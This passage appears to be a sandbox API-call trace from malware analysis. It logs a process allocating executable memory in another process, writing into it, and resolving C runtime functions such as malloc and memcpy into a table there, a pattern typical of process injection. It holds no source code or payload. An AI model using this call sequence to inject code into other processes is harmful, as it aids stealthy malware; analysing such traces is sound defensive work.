	[0240.260] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce9a*, nSize=0xb, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce9a*, lpNumberOfBytesWritten=0x12858c*=0xb) returned 1
	[0240.260] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.260] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.260] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.261] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.261] ResetEvent (hEvent=0x680) returned 1
	[0240.261] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.270] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.270] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.270] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.270] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2e4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.270] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.270] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.270] lstrlenA (lpString="malloc") returned 6
	[0240.270] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.271] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcea8*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcea8*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.271] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.271] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.271] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.272] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.272] ResetEvent (hEvent=0x680) returned 1
	[0240.272] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.272] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.272] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.273] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.273] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2e8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.273] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.273] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.273] lstrlenA (lpString="memcpy") returned 6
	[0240.273] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.274] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bceb2*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bceb2*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.274] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.274] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.274] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.275] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.275] ResetEvent (hEvent=0x680) returned 1
	[0240.275] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.275] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.275] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.275] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.275] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2ec, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.276] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.276] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.276] lstrlenA (lpString="memset") returned 6
	[0240.276] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.276] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcebc*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcebc*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.277] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.277] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.277] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.277] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.278] ResetEvent (hEvent=0x680) returned 1
	[0240.278] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.278] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.278] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.278] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.278] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2f0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.279] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.279] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.279] lstrlenA (lpString="setlocale") returned 9
	[0240.279] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.279] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcec6*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcec6*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0240.279] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.279] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.279] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.280] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.280] ResetEvent (hEvent=0x680) returned 1
	[0240.280] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.280] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.281] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.281] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.281] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2f4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.281] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.281] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.281] lstrlenA (lpString="strchr") returned 6
	[0240.281] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.282] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bced2*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bced2*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.282] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.282] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.282] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.283] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.283] ResetEvent (hEvent=0x680) returned 1
	[0240.283] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.284] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.284] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.284] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.284] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2f8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.284] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.285] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.285] lstrlenA (lpString="strerror") returned 8
	[0240.285] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.285] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcedc*, nSize=0x9, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcedc*, lpNumberOfBytesWritten=0x12858c*=0x9) returned 1
	[0240.285] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.285] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.285] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.286] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.286] ResetEvent (hEvent=0x680) returned 1
	[0240.286] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.286] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.286] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.287] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.287] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2fc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.287] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.287] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.288] lstrlenA (lpString="strlen") returned 6
	[0240.288] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.288] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcee8*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcee8*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.288] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.288] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.289] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.289] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.289] ResetEvent (hEvent=0x680) returned 1
	[0240.289] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.290] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.290] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.290] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.290] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f300, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.290] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.291] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.291] lstrlenA (lpString="strncmp") returned 7
	[0240.291] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.291] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcef2*, nSize=0x8, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcef2*, lpNumberOfBytesWritten=0x12858c*=0x8) returned 1
	[0240.291] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.291] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.291] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.292] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.292] ResetEvent (hEvent=0x680) returned 1
	[0240.292] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.292] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.292] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.293] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.293] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.293] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.293] lstrlenA (lpString="strncpy") returned 7
	[0240.293] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.294] ResetEvent (hEvent=0x680) returned 1
	[0240.294] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.294] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.294] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.295] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.295] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.295] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.295] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.295] lstrlenA (lpString="strstr") returned 6
	[0240.295] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.296] ResetEvent (hEvent=0x680) returned 1
	[0240.296] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.296] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.296] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.296] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.297] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.297] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.297] lstrlenA (lpString="_unlock") returned 7
	[0240.297] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.298] ResetEvent (hEvent=0x680) returned 1
	[0240.298] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.298] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.298] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.298] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.298] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.298] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.299] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.299] lstrlenA (lpString="abort") returned 5
	[0240.299] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.299] ResetEvent (hEvent=0x680) returned 1
	[0240.299] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.300] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.300] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.300] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.300] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.300] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
